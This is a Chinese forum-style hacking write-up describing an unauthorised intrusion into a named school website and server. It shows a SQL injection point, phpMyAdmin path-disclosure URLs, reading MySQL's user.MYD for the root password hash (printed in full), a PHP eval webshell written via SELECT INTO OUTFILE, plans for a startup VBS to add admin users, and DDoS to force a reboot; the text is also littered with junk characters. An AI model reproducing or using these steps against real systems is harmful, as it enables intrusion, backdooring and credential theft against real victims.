第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏 P: P; c0 G* B9 S3 o& b
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
( \' x# e% J$ V! O" |+ n2 X8 E
# K9 b1 i! T9 Q
: K/ U. T, b, {& L- w H! G3 s: F* T$ ?! y" g5 x6 `
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
5 P( E# P0 X$ ? i3 l; S
* P! v2 n6 V4 D) l. d- f* v' Q那么想可以直接写入shell ,getshell有几个条件:
0 h1 z4 ?* ]- F& {5 B1 R) l9 {1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF - O$ ?6 r' W4 |9 Y" y% k, s
3 B) }* y, L" g9 S试着爆绝对路径: 0 A% g7 U9 v2 b d6 X
1./phpMyAdmin/index.php?lang[]=1 ; C$ F* i: \. ~5 o7 n
2./phpMyAdmin/phpinfo.php
) e1 @; T) V5 E" s/ _3./load_file() ! x' s( a. j( l6 r$ ]( F2 v9 E. ~$ C
4./phpmyadmin/themes/darkblue_orange/layout.inc.php 7 R( e5 _% X. h }6 y
5./phpmyadmin/libraries/select_lang.lib.php
. {5 E0 w) G' }3 F" j& Q/ V6./phpmyadmin/libraries/lect_lang.lib.php
% n4 J7 I1 b3 G% w D4 m+ ?7./phpmyadmin/libraries/mcrypt.lib.php . C+ P; b0 J) M3 a5 ~
8./phpmyadmin/libraries/export/xls.php
1 e; D# |; [7 _ u7 r. }
$ X- X* h; q( \+ F0 j+ H均不行...........................
% I* Q! f* w5 Y9 _. M1 k8 D/ n9 i6 K: U2 o+ o) e: L! D* a6 K
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
! \& w$ ~7 g1 b1 X- U$ b) f; r0 |/ _" M
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
& j- `% y7 p% m* P+ z& F
( }" O8 g( F( b# ~默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
% \% Q% ~& U& U0 V3 ? g! m
4 G' k3 @* ~3 [& @; K敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... , `, m; `- b: ?
" t, Y) N: t- V ~! b0 g
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell # f. \) U' v' [4 j) ~1 C8 g
+ h4 c8 {, n1 u& yhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 5 z% r4 I- I! M; }8 B
+ G2 o& b; M) }8 g8 w) M! `
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD - [# B6 q% h% t$ c; p# \# V4 H
3 c+ i" ^* L. K% Y+ ?成功读到root密码:
0 P4 C* F3 n( @. ?; C$ b3 r6 G1 ?9 h: c1 F4 p
17---- r(0072)
/ V$ J7 U, o' b, ]4 r8 b+ u18---- o(006f)
/ }7 C" W+ z7 H19---- o(006f)
( G7 F$ F! d" c0 W20---- t(0074) 1 k0 g; A1 U5 Y. \& i' z$ ~+ V
21---- *(002a) / i4 I e9 Q& y* A8 ^
22---- 8(0038) / X6 E7 W% H& u5 n j. ^4 b
23---- 2(0032)
! G) G p' E! _% s7 X3 X5 |: q24---- E(0045) 5 ~9 v) w' l1 ], V4 e/ Y, Q
25---- 1(0031)
/ N- |( a; G, K; a$ D26---- C(0043) ' l) o- b A9 X/ f( ]: m. y3 i
27---- 5(0035)
4 @9 A6 _. _* C: R9 o2 ^8 c0 g8 i28---- 8(0038) : @/ {$ `$ m- |3 d. @: ~
29---- 2(0032)
: p! ]1 Q# C! D4 ?. Y% R30---- 8(0038)
# k+ F/ }; c6 u; H) i% y7 Q; W31---- A(0041)
6 l' |! H3 o) v32---- 9(0039)
0 o, V# q4 [; \2 }# _33---- B(0042) 0 G2 ~8 a1 S! T ]) G+ |/ U1 ]1 T
34---- 5(0035) + e. C' [" X d. ^* s0 Q6 }
35---- 4(0034)
3 I' _- d V7 E# Z- z# O9 P36---- 8(0038) * z w' c" t7 L; w J6 Y
37---- 6(0036)
9 A; |3 G; l c0 b# d; C38---- 4(0034) - X. z9 p- O( K+ ?
39---- 9(0039) 8 }* B) ^) D- J# P1 E% }/ T
40---- 1(0031)
6 @3 T% [$ q8 X. Y8 f$ @$ Z41---- 1(0031) : U; p8 j) ?2 w2 F& }4 g0 R
42---- 5(0035) # {5 G3 C5 w9 ]; M" v
43---- 3(0033) , v5 ~3 m* I- ]8 F+ b
44---- 5(0035) 6 |+ O0 }& m' q
45---- 9(0039) . ~- w: h1 H3 W2 V3 P5 P- z K
46---- 8(0038) ) Y B, B" N1 ]0 J
47---- F(0046) + c6 E! s6 p- z: _2 ]/ m- _8 o
48---- F(0046) ( a5 s+ D2 F$ n% Z) g5 B# i* v
49---- 4(0034) $ b, Q" \2 F- M4 b# I/ Y, i4 `
50---- F(0046)
q- w. U* S; k( ]6 U; {51---- 0(0030) 7 z/ i1 M: S5 ]8 E1 G5 s6 Q# R
52---- 3(0033)
- t. C9 J( p& v+ r# @2 X. U53---- 2(0032)
: s! v } g( N5 }54---- A(0041)
! e7 E' n& m( u0 A, `1 ^' `9 u55---- 4(0034)
2 B! W2 Z' O9 f0 _% c7 G56---- A(0041) + u: G8 G5 M( s5 J
57---- B(0042)
& f2 e9 y' S- i) E! h- g" ?58---- *(0044)
3 Q( `: e, z ~, J59---- *(0035)
% L7 [: F( L; N* z" t; t60---- *(0041)
, P$ C. B& e' J7 z- Z) J3 k61---- *0032) 2 y6 a' m0 G% S2 ` |
3 D7 V7 D3 z) _, Y f ]; [
解密后成功登陆phpmyamin 2 M5 u+ s4 u: j/ k6 U
: K$ C7 [7 P* h" l5 D5 Y) g
! b+ N3 a$ J4 u% l 4 \! m8 P1 B, o& F" ]6 z
9 i0 y8 p4 g7 H( z! ^, `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
" u. i: A9 p" e: C9 f j% E
+ E8 `) T- b2 Y成功执行,拿下shell,菜刀连接:
: y5 F$ O: Y4 B" d; S. j4 @; V+ |! }9 f8 ^# W
服务器不支持asp,aspx,php提权无果...................
4 d' S5 p8 I, ~. [
* H" `8 F, X& u+ }1 ?9 q但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
6 k% l" E$ ^6 w; z服务器上已经有个隐藏帐号了 8 |/ l! _0 B6 T* w# ~) i* z" x
别名 administrators
% ~" f* p& p! @- d7 m注释 管理员对计算机/域有不受限制的完全访问权
" z5 q( ]4 N \1 p成员
/ P& H5 S; b( S-------------------------------------------------------------------------------
# Z, I+ {+ d6 `, y% A; f: Nadmin) \* C4 m$ ^1 `, E# T
Administrator
1 V0 I: ]- t$ Z) oslipper$ t# Z$ x/ a/ K) R
sqluser, L, S" |( R2 {/ {) g( c5 N5 ^% X. J
命令成功完成。 1 ~& Q* c0 ^# K$ |9 V
; A: Y$ B9 ?8 E+ l L5 A) O' x- q
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。8 M! S4 h* D4 a! H5 |5 m
3 Q& Z8 N+ ^9 | {. M3 m% X; S% Iddos服务器重启,不然就只能坐等服务器重启了...............................
5 a2 S% R0 I. E" i# I( G% @8 D1 i: h) R5 n
! s% P( z x/ E |